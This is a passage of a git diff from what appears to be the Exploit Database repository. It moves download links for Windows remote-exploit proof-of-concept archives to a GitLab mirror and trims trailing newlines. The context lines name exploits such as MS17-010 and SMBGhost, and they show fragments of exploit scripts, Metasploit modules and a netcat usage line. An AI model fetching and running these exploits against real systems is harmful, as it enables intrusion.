-https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36829.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36829.zip \ No newline at end of file diff --git a/exploits/windows/remote/3746.txt b/exploits/windows/remote/3746.txt index 5d8557d57..58c47a5db 100644 --- a/exploits/windows/remote/3746.txt +++ b/exploits/windows/remote/3746.txt @@ -52,6 +52,6 @@ also available at http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip http://www.48bits.com/exploits/dnsxpl.v2.1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3746.zip (04172007-dnsxpl.v2.1.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3746.zip (04172007-dnsxpl.v2.1.zip) # milw0rm.com [2007-04-18] \ No newline at end of file diff --git a/exploits/windows/remote/37840.txt b/exploits/windows/remote/37840.txt index c1066187d..45bb730b6 100644 --- a/exploits/windows/remote/37840.txt +++ b/exploits/windows/remote/37840.txt @@ -14,4 +14,4 @@ The PoC writes calc.bat to startup folder. It has been tested by injecting the d Jietao Yang of KeenTeam (@K33nTeam) is credited for the vulnerability. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37840.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37840.zip \ No newline at end of file diff --git a/exploits/windows/remote/37841.txt b/exploits/windows/remote/37841.txt index 85e42c034..3bddc6f89 100644 --- a/exploits/windows/remote/37841.txt +++ b/exploits/windows/remote/37841.txt @@ -15,4 +15,4 @@ Jietao Yang and Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerabili Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37841.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37841.zip \ No newline at end of file diff --git a/exploits/windows/remote/37842.txt b/exploits/windows/remote/37842.txt index 90281f53a..19fb1d132 100644 --- a/exploits/windows/remote/37842.txt +++ b/exploits/windows/remote/37842.txt @@ -13,4 +13,4 @@ The PoC writes calc.bat to startup folder. It has been tested by injecting the d 2. Credit Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37842.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37842.zip \ No newline at end of file diff --git a/exploits/windows/remote/3804.txt b/exploits/windows/remote/3804.txt index 609884b84..3bfa416bc 100644 --- a/exploits/windows/remote/3804.txt +++ b/exploits/windows/remote/3804.txt @@ -1,5 +1,5 @@ MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3804.zip (04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3804.zip (04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip) # milw0rm.com [2007-04-26] \ No newline at end of file diff --git a/exploits/windows/remote/38384.txt b/exploits/windows/remote/38384.txt index 5163ce655..a3dc07110 100644 --- a/exploits/windows/remote/38384.txt +++ b/exploits/windows/remote/38384.txt @@ -9,4 +9,4 @@ $ sudo openssl s_server -key key.pem -cert cert.pem -accept 443 Then visit that https server from a machine with Avast installed. Click the message that appears to demonstrate launching calc.exe. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38384.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38384.zip \ No newline at end of file diff --git a/exploits/windows/remote/38644.txt b/exploits/windows/remote/38644.txt index 355af9da0..dd6ee20a2 100644 --- a/exploits/windows/remote/38644.txt +++ b/exploits/windows/remote/38644.txt @@ -28,4 +28,4 @@ Please note that a manager restart will be needed before you can login with the can be accomplished by running "/etc/init.d/contego-manager restart" Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38644.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38644.zip \ No newline at end of file diff --git a/exploits/windows/remote/38742.txt b/exploits/windows/remote/38742.txt index 55c57f492..7555a059e 100644 --- a/exploits/windows/remote/38742.txt +++ b/exploits/windows/remote/38742.txt @@ -4,4 +4,4 @@ Aloaha PDF Suite is prone to a stack-based buffer-overflow vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause denial-of-service conditions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/62036.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/62036.zip \ No newline at end of file diff --git a/exploits/windows/remote/38918.txt b/exploits/windows/remote/38918.txt index 43f8d0623..63cf8047f 100644 --- a/exploits/windows/remote/38918.txt +++ b/exploits/windows/remote/38918.txt @@ -44,4 +44,4 @@ It is also possible to trigger this DLL load without a user click with the follo Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38918.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38918.zip \ No newline at end of file diff --git a/exploits/windows/remote/38968.txt b/exploits/windows/remote/38968.txt index d0558460e..3a9d255b2 100644 --- a/exploits/windows/remote/38968.txt +++ b/exploits/windows/remote/38968.txt @@ -93,4 +93,4 @@ It is also possible to trigger this DLL load without requiring a user click by u Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38968.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38968.zip \ No newline at end of file diff --git a/exploits/windows/remote/39161.py b/exploits/windows/remote/39161.py index 3339499b5..a6862c239 100755 --- a/exploits/windows/remote/39161.py +++ b/exploits/windows/remote/39161.py @@ -46,4 +46,4 @@ try: except: print """[.]Something went wrong..! Usage is :[.] python exploit.py - Don't forgot to change the Local IP address and Port number on the script""" + Don't forgot to change the Local IP address and Port number on the script""" \ No newline at end of file diff --git a/exploits/windows/remote/39599.txt b/exploits/windows/remote/39599.txt index 15d39b5b1..0a22d1b0d 100644 --- a/exploits/windows/remote/39599.txt +++ b/exploits/windows/remote/39599.txt @@ -109,4 +109,4 @@ Any secrets stored in the registry are also exposed to attackers via RegQueryVal Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39599.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39599.zip \ No newline at end of file diff --git a/exploits/windows/remote/39805.txt b/exploits/windows/remote/39805.txt index 03175fdd4..43baadc54 100644 --- a/exploits/windows/remote/39805.txt +++ b/exploits/windows/remote/39805.txt @@ -20,6 +20,6 @@ file is: "MS-Windows-Media-Center-May-2016-RCE-POC--Password-is-mcl.zip" Password: mcl EDB PoC Mirror: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39805.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39805.zip I am also attaching the file as "MS-Windows-Media-Center-May-2016-RCE-POC--Password-is-mcl[dot]zip.txt" (extension is txt, but it is an actual .ZIP archive, so rename to ".ZIP" upon downloading it). Archive opens successfully on any Windows version. \ No newline at end of file diff --git a/exploits/windows/remote/40990.txt b/exploits/windows/remote/40990.txt index 8ae7528d1..c2760f976 100644 --- a/exploits/windows/remote/40990.txt +++ b/exploits/windows/remote/40990.txt @@ -1,6 +1,6 @@ Source: https://github.com/theori-io/chakra-2016-11 -Proofs of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40990.zip +Proofs of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40990.zip chakra.dll Info Leak + Type Confusion for RCE diff --git a/exploits/windows/remote/41073.py b/exploits/windows/remote/41073.py index 4899bdc70..059d22884 100755 --- a/exploits/windows/remote/41073.py +++ b/exploits/windows/remote/41073.py @@ -54,9 +54,4 @@ print 'Listening on LPD port: '+str(port) while True: conn, addr = s.accept() conn.send(buffer) - conn.close() - - - - - + conn.close() \ No newline at end of file diff --git a/exploits/windows/remote/41479.py b/exploits/windows/remote/41479.py index cb2d86e8b..6531c5728 100755 --- a/exploits/windows/remote/41479.py +++ b/exploits/windows/remote/41479.py @@ -64,4 +64,4 @@ print(len(rev_met_2)) while True: conn, addr = s.accept() conn.send('220 '+buffer+'ESMTP Sendmail \r\n') - conn.close() + conn.close() \ No newline at end of file diff --git a/exploits/windows/remote/41545.py b/exploits/windows/remote/41545.py index fd1905992..b8c106554 100755 --- a/exploits/windows/remote/41545.py +++ b/exploits/windows/remote/41545.py @@ -64,4 +64,4 @@ elif len(rev_met_2) >= 76: while True: conn, addr = s.accept() conn.send('220 '+buffer+'\r\n') - conn.close() + conn.close() \ No newline at end of file diff --git a/exploits/windows/remote/418.c b/exploits/windows/remote/418.c index 69834748b..be8bf5487 100644 --- a/exploits/windows/remote/418.c +++ b/exploits/windows/remote/418.c @@ -2,7 +2,7 @@ This 0day exploit is known to be circulating in the wild There is no patch for this vulnerability -> Do not use Winamp ! -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/418.rar (skinhead.rar - 171 Ko) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/418.rar (skinhead.rar - 171 Ko) index.html diff --git a/exploits/windows/remote/4188.txt b/exploits/windows/remote/4188.txt index feb635c7f..d9b6c01f7 100644 --- a/exploits/windows/remote/4188.txt +++ b/exploits/windows/remote/4188.txt @@ -2,6 +2,6 @@ Author:(yunshu) http://www.ph4nt0m.org poc: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4188.zip (07162007-flash_flv_9.0.45.0_exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4188.zip (07162007-flash_flv_9.0.45.0_exp.zip) # milw0rm.com [2007-07-16] \ No newline at end of file diff --git a/exploits/windows/remote/41894.py b/exploits/windows/remote/41894.py index 2cf5f50c4..eb5688f65 100755 --- a/exploits/windows/remote/41894.py +++ b/exploits/windows/remote/41894.py @@ -3,7 +3,7 @@ ## Exploit toolkit CVE-2017-0199 - v4.0 (https://github.com/bhdresh/CVE-2017-0199) ## -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41894.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41894.zip ''' import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile from random import randint diff --git a/exploits/windows/remote/41903.txt b/exploits/windows/remote/41903.txt index 2ddc9452c..c896b6872 100644 --- a/exploits/windows/remote/41903.txt +++ b/exploits/windows/remote/41903.txt @@ -42,4 +42,4 @@ A copy of CMD and Notepad is executed on the server in the context of the callin Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41903.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41903.zip \ No newline at end of file diff --git a/exploits/windows/remote/41975.txt b/exploits/windows/remote/41975.txt index 51bc76540..0a60ea351 100644 --- a/exploits/windows/remote/41975.txt +++ b/exploits/windows/remote/41975.txt @@ -126,4 +126,4 @@ We have verified that on Windows 10, adding a blanket exception for C:\ is enoug Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41975.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41975.zip \ No newline at end of file diff --git a/exploits/windows/remote/42315.py b/exploits/windows/remote/42315.py index 1e82858fd..4c56f8237 100755 --- a/exploits/windows/remote/42315.py +++ b/exploits/windows/remote/42315.py @@ -9,7 +9,7 @@ import time ''' MS17-010 exploit for Windows 2000 and later by sleepya -EDB Note: mysmb.py can be found here ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py +EDB Note: mysmb.py can be found here ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42315.py Note: - The exploit should never crash a target (chance should be nearly 0%) diff --git a/exploits/windows/remote/42557.py b/exploits/windows/remote/42557.py index 86faea782..9760dcb95 100755 --- a/exploits/windows/remote/42557.py +++ b/exploits/windows/remote/42557.py @@ -93,4 +93,4 @@ packet += "Connection: keep-alive\r\n" packet += "Referer: http://pyramidcyber.com\r\n" packet += "\r\n" s.send(packet) -s.close() +s.close() \ No newline at end of file diff --git a/exploits/windows/remote/42558.py b/exploits/windows/remote/42558.py index 579051b9a..a996d1236 100755 --- a/exploits/windows/remote/42558.py +++ b/exploits/windows/remote/42558.py @@ -93,4 +93,4 @@ packet += "Connection: keep-alive\r\n" packet += "Referer: http://pyramidcyber.com\r\n" packet += "\r\n" s.send(packet) -s.close() +s.close() \ No newline at end of file diff --git a/exploits/windows/remote/42559.py b/exploits/windows/remote/42559.py index efe341c05..43b3d4d09 100755 --- a/exploits/windows/remote/42559.py +++ b/exploits/windows/remote/42559.py @@ -93,4 +93,4 @@ packet += "Connection: keep-alive\r\n" packet += "Referer: http://pyramidcyber.com\r\n" packet += "\r\n" s.send(packet) -s.close() +s.close() \ No newline at end of file diff --git a/exploits/windows/remote/42560.py b/exploits/windows/remote/42560.py index 90134784b..15c8fe9a6 100755 --- a/exploits/windows/remote/42560.py +++ b/exploits/windows/remote/42560.py @@ -93,4 +93,4 @@ packet += "Connection: keep-alive\r\n" packet += "Referer: http://pyramidcyber.com\r\n" packet += "\r\n" s.send(packet) -s.close() +s.close() \ No newline at end of file diff --git a/exploits/windows/remote/42691.rb b/exploits/windows/remote/42691.rb index 399a78ee4..deb8ed7d3 100755 --- a/exploits/windows/remote/42691.rb +++ b/exploits/windows/remote/42691.rb @@ -65,4 +65,4 @@ class MetasploitModule < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42693.rb b/exploits/windows/remote/42693.rb index e6c49b95f..cc50d2e22 100755 --- a/exploits/windows/remote/42693.rb +++ b/exploits/windows/remote/42693.rb @@ -70,4 +70,4 @@ class MetasploitModule < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42694.rb b/exploits/windows/remote/42694.rb index d279202e7..70322006a 100755 --- a/exploits/windows/remote/42694.rb +++ b/exploits/windows/remote/42694.rb @@ -97,4 +97,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42696.rb b/exploits/windows/remote/42696.rb index 79f6f2b3c..67f8d4573 100755 --- a/exploits/windows/remote/42696.rb +++ b/exploits/windows/remote/42696.rb @@ -81,4 +81,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42700.rb b/exploits/windows/remote/42700.rb index f27af4abd..345ba22a1 100755 --- a/exploits/windows/remote/42700.rb +++ b/exploits/windows/remote/42700.rb @@ -68,4 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42703.rb b/exploits/windows/remote/42703.rb index 48e482bb0..f0e0b124c 100755 --- a/exploits/windows/remote/42703.rb +++ b/exploits/windows/remote/42703.rb @@ -109,4 +109,4 @@ class MetasploitModule < Msf::Exploit::Remote end end -__END__ +__END__ \ No newline at end of file diff --git a/exploits/windows/remote/42704.rb b/exploits/windows/remote/42704.rb index 27c28cf4d..62eff8479 100755 --- a/exploits/windows/remote/42704.rb +++ b/exploits/windows/remote/42704.rb @@ -124,4 +124,4 @@ class MetasploitModule < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42711.txt b/exploits/windows/remote/42711.txt index 5412d2dfd..a850fdea2 100644 --- a/exploits/windows/remote/42711.txt +++ b/exploits/windows/remote/42711.txt @@ -14,4 +14,4 @@ If all is good mspaint should run. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42711.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42711.zip \ No newline at end of file diff --git a/exploits/windows/remote/42719.rb b/exploits/windows/remote/42719.rb index 18a506296..845539c26 100755 --- a/exploits/windows/remote/42719.rb +++ b/exploits/windows/remote/42719.rb @@ -121,4 +121,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42720.rb b/exploits/windows/remote/42720.rb index 86d23d410..e319b9370 100755 --- a/exploits/windows/remote/42720.rb +++ b/exploits/windows/remote/42720.rb @@ -109,4 +109,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42721.rb b/exploits/windows/remote/42721.rb index b44530b8e..f04a69bac 100755 --- a/exploits/windows/remote/42721.rb +++ b/exploits/windows/remote/42721.rb @@ -85,4 +85,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42722.rb b/exploits/windows/remote/42722.rb index 94e1bf702..c2697b63a 100755 --- a/exploits/windows/remote/42722.rb +++ b/exploits/windows/remote/42722.rb @@ -102,4 +102,4 @@ __END__ 0033C081 5E POP ESI 0033C082 B8 01000000 MOV EAX,1 0033C087 5B POP EBX -0033C088 C3 RETN +0033C088 C3 RETN \ No newline at end of file diff --git a/exploits/windows/remote/42723.rb b/exploits/windows/remote/42723.rb index c8c8936cd..a90c4f2eb 100755 --- a/exploits/windows/remote/42723.rb +++ b/exploits/windows/remote/42723.rb @@ -71,4 +71,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42724.rb b/exploits/windows/remote/42724.rb index 735e1b2ae..c6705b37b 100755 --- a/exploits/windows/remote/42724.rb +++ b/exploits/windows/remote/42724.rb @@ -75,4 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42725.rb b/exploits/windows/remote/42725.rb index 86c0038a7..766f32173 100755 --- a/exploits/windows/remote/42725.rb +++ b/exploits/windows/remote/42725.rb @@ -85,4 +85,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("#{peer} - Uploading .mof...") upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42778.py b/exploits/windows/remote/42778.py index dbd323e29..b9cb6a5cb 100755 --- a/exploits/windows/remote/42778.py +++ b/exploits/windows/remote/42778.py @@ -86,4 +86,4 @@ if __name__ == "__main__": t = threading.Thread(target=send_egghunter_request) t.start() print "[+] Thread started." - send_exploit_request() + send_exploit_request() \ No newline at end of file diff --git a/exploits/windows/remote/42952.py b/exploits/windows/remote/42952.py index ef88b151b..a590d40e3 100755 --- a/exploits/windows/remote/42952.py +++ b/exploits/windows/remote/42952.py @@ -60,5 +60,4 @@ try: print "Serving at port: ", 3311 httpd.serve_forever() except: - print "Exiting..." - + print "Exiting..." \ No newline at end of file diff --git a/exploits/windows/remote/42973.py b/exploits/windows/remote/42973.py index 9e980751e..7c4e03ccb 100755 --- a/exploits/windows/remote/42973.py +++ b/exploits/windows/remote/42973.py @@ -100,4 +100,4 @@ print "Sending the payload!" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("10.10.10.10", 80)) expl.send(buf) -expl.close() +expl.close() \ No newline at end of file diff --git a/exploits/windows/remote/42984.rb b/exploits/windows/remote/42984.rb index 44701b265..7535cce62 100755 --- a/exploits/windows/remote/42984.rb +++ b/exploits/windows/remote/42984.rb @@ -92,4 +92,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/43025.py b/exploits/windows/remote/43025.py index 180924f10..27ea6e769 100755 --- a/exploits/windows/remote/43025.py +++ b/exploits/windows/remote/43025.py @@ -64,6 +64,4 @@ while True: print conn.recv(1024) conn.send(buff + '\r\n') print conn.recv(1024) - conn.send('257' + '\r\n') - - + conn.send('257' + '\r\n') \ No newline at end of file diff --git a/exploits/windows/remote/43059.py b/exploits/windows/remote/43059.py index 35861f0f0..a0c32bc75 100755 --- a/exploits/windows/remote/43059.py +++ b/exploits/windows/remote/43059.py @@ -76,4 +76,4 @@ csock.send(buf) print binascii.hexlify(csock.recv(0x4000)) #necessary reads print binascii.hexlify(csock.recv(0x4000)) -csock.close() +csock.close() \ No newline at end of file diff --git a/exploits/windows/remote/43163.txt b/exploits/windows/remote/43163.txt index f24edcd67..ee6321082 100644 --- a/exploits/windows/remote/43163.txt +++ b/exploits/windows/remote/43163.txt @@ -29,4 +29,4 @@ example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability an Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43163.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43163.zip \ No newline at end of file diff --git a/exploits/windows/remote/4334.txt b/exploits/windows/remote/4334.txt index a977c9079..9892fa2f1 100644 --- a/exploits/windows/remote/4334.txt +++ b/exploits/windows/remote/4334.txt @@ -7,6 +7,6 @@ thanks ole andre again, His ospy is perfect. 3. choose "send my webcam" to a contact id who is online using 7.x (8.0?). 4.when the otherside accept the invatation , the otherside's msn will be at least crashed, if you using aChinese version windows 2000 sp4 , maybe a reverse shell , if other verison windows 2000, you need adjust the jmpa address in the dll's sourcecode. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4334.rar (08292007-exp_msn.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4334.rar (08292007-exp_msn.rar) # milw0rm.com [2007-08-29] \ No newline at end of file diff --git a/exploits/windows/remote/44453.md b/exploits/windows/remote/44453.md index 847ce3fe7..4277a2a9c 100644 --- a/exploits/windows/remote/44453.md +++ b/exploits/windows/remote/44453.md @@ -22,7 +22,7 @@ $ cd ../../rdpy $ sudo python setup.py install ``` -EDB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44453.zip +EDB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44453.zip * It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography). * A different version of openssl needed to be installed for this to run successfully. The install script does that. diff --git a/exploits/windows/remote/44582.txt b/exploits/windows/remote/44582.txt index 572270393..7618b4c40 100644 --- a/exploits/windows/remote/44582.txt +++ b/exploits/windows/remote/44582.txt @@ -8,4 +8,4 @@ The code has been published as the vulnerability used has been patched on all co For more information, read the post at https://momo5502.com/blog/?p=34 -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44582.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44582.zip \ No newline at end of file diff --git a/exploits/windows/remote/44987.txt b/exploits/windows/remote/44987.txt index 8134d19a9..b51a80aac 100644 --- a/exploits/windows/remote/44987.txt +++ b/exploits/windows/remote/44987.txt @@ -13,4 +13,4 @@ overflow in Call of Duty: Modern Warfare (amongst other versions). 2. Proof of Concept -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44987.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44987.zip \ No newline at end of file diff --git a/exploits/windows/remote/45502.txt b/exploits/windows/remote/45502.txt index ae7796e35..34998ab10 100644 --- a/exploits/windows/remote/45502.txt +++ b/exploits/windows/remote/45502.txt @@ -19,4 +19,4 @@ To reproduce the PoC, you will need a remote machine hosting a samba server and Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45502.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45502.zip \ No newline at end of file diff --git a/exploits/windows/remote/46220.txt b/exploits/windows/remote/46220.txt index 328757dca..b8f6a9326 100644 --- a/exploits/windows/remote/46220.txt +++ b/exploits/windows/remote/46220.txt @@ -18,4 +18,4 @@ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46220.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46220.zip \ No newline at end of file diff --git a/exploits/windows/remote/4664.txt b/exploits/windows/remote/4664.txt index 275792a6e..1c77161fb 100644 --- a/exploits/windows/remote/4664.txt +++ b/exploits/windows/remote/4664.txt @@ -37,6 +37,6 @@ Fuckz 2: - wslabi.com (too stupid resource for selling shit) - ICEPACK and MPACK coderz (Fucking javascript kidd0z and code thiefz) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4664.tar.gz (11272007-qt_public.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4664.tar.gz (11272007-qt_public.tar.gz) # milw0rm.com [2007-11-27] \ No newline at end of file diff --git a/exploits/windows/remote/4699.txt b/exploits/windows/remote/4699.txt index 5a64d926e..58f180e0e 100644 --- a/exploits/windows/remote/4699.txt +++ b/exploits/windows/remote/4699.txt @@ -112,7 +112,7 @@ disconnects from it. Example queries to send with netcat: http://aluigi.org/poc/fireflyz.zip - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4699.zip (2007-fireflyz.zip) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4699.zip (2007-fireflyz.zip) nc localhost 9999 -v -v < file.txt diff --git a/exploits/windows/remote/4715.txt b/exploits/windows/remote/4715.txt index 9d0d45155..b07a7d832 100644 --- a/exploits/windows/remote/4715.txt +++ b/exploits/windows/remote/4715.txt @@ -86,7 +86,7 @@ http://aluigi.org/poc/badbluebof.txt B] http://aluigi.org/testz/myhttpup.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4715.zip (2007-myhttpup.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4715.zip (2007-myhttpup.zip) myhttpup http://SERVER/upload.dll file.txt ../../file.txt filedata0 diff --git a/exploits/windows/remote/4760.txt b/exploits/windows/remote/4760.txt index 1f9459113..eb4e736a2 100644 --- a/exploits/windows/remote/4760.txt +++ b/exploits/windows/remote/4760.txt @@ -79,6 +79,6 @@ Microsoft Windows 2000 [Versión 5.00.2195] C:\WINNT\system32> Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4760.zip (2007-MessageQueue.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4760.zip (2007-MessageQueue.zip) # milw0rm.com [2007-12-21] \ No newline at end of file diff --git a/exploits/windows/remote/48537.py b/exploits/windows/remote/48537.py index f240bea81..731860a47 100755 --- a/exploits/windows/remote/48537.py +++ b/exploits/windows/remote/48537.py @@ -1,6 +1,6 @@ #!/usr/bin/env python ''' -# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48537.zip +# EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48537.zip # SMBGhost_RCE_PoC diff --git a/exploits/windows/remote/4906.txt b/exploits/windows/remote/4906.txt index 36fe13def..43150b213 100644 --- a/exploits/windows/remote/4906.txt +++ b/exploits/windows/remote/4906.txt @@ -1,5 +1,5 @@ Quicktime Player 7.3.1.70 rtsp Remote Buffer Overflow Exploit PoC -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4906.zip (2008-quicktimebof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4906.zip (2008-quicktimebof.zip) # milw0rm.com [2008-01-14] \ No newline at end of file diff --git a/exploits/windows/remote/4948.txt b/exploits/windows/remote/4948.txt index 68f2cd6c0..5bb5fbf05 100644 --- a/exploits/windows/remote/4948.txt +++ b/exploits/windows/remote/4948.txt @@ -1,5 +1,5 @@ Windows RSH daemon <= 1.8 Remote Buffer Overflow Exploit -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz) # milw0rm.com [2008-01-21] \ No newline at end of file diff --git a/exploits/windows/remote/4949.txt b/exploits/windows/remote/4949.txt index 3cb655b75..d816ed06a 100644 --- a/exploits/windows/remote/4949.txt +++ b/exploits/windows/remote/4949.txt @@ -1,5 +1,5 @@ Citadel SMTP <= 7.10 Remote Overflow Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4949.tar.gz (2008-vs-GNU-citadel.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4949.tar.gz (2008-vs-GNU-citadel.tar.gz) # milw0rm.com [2008-01-21] \ No newline at end of file diff --git a/exploits/windows/remote/5213.txt b/exploits/windows/remote/5213.txt index 92c0c6251..787457169 100644 --- 